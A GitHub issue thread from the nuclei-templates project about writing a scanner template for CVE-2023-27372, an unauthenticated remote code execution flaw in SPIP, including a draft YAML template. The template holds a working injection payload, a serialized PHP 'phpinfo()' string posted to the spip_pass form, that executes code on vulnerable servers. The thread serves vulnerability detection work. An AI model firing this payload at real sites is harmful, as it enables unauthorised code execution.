### ISSUE TITLE
CVE-2023-27372 - SPIP RCE (Unauthenticated)

### ISSUE THREAD

**Issue by whereveryouare666** [projectdiscovery/nuclei-templates#7501]
### Template for?

CVE-2023-27372

### Details:
This the PoC for Exploit
https://github.com/nuts7/CVE-2023-27372

**Comment by rxphgui** [comment]
GG @nuts7

**Comment by nuts7** [comment]
@DhiyaneshGeek Can you handle it ? Otherwise I can do it. It was in my ambitions. 🙂

**Comment by whereveryouare666** [comment]
@DhiyaneshGeek @nuts7 Let's create this ! :)

**Comment by DhiyaneshGeek** [comment]
Hi @nuts7 @whereveryouare666 

i have created the template and raised the PR for the same #7510 

Thank you 😄

**Comment by nuts7** [comment]
Hi @DhiyaneshGeek :)

For your PR, I tested it and it doesn't seem to be perfected yet, I was creating the template before I saw your PR. ^^
What's more, I don't think it's a good idea to rely on the /etc/passwd file, since SPIP can be hosted on Windows.

This is my first nuclei template creation and I have a problem if you know how to fix this and after I can create a PR.

Error : `[WRN] [CVE-2023-27372] Could not make http request for http://domain.local: unresolved variables found: anti-csrf-token`

```yaml
id: CVE-2023-27372

info:
  name: SPIP < 4.2.1 - Remote Code Execution (Unauthenticated)
  author: nuts7
  severity: critical
  description: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled.
  reference:
    - https://github.com/nuts7/CVE-2023-27372
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27372
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27372
  metadata:
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    verified: "true"
  tags: cve,cve2023,spip,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=spip_pass"
    headers:
      Host: "{{Hostname}}"
  - method: POST
    path:
      - "{{BaseURL}}/spip.php?page=spip_pass"
    headers:
      Content-Type: application/x-www-form-urlencoded
      Host: "{{Hostname}}"
    body: 'page=spip_pass&formulaire_action=oubli&formulaire_action_args={{anti-csrf-token}}&oubli=s:19:"<?php phpinfo(); ?>";'
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Version"
          - "$_SERVER"
          - "license@php.net"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: xpath
        name: anti-csrf-token
        part: body
        group: 1
        internal: true
        xpath:
          - "//input[@name='formulaire_action_args']/@value"
```
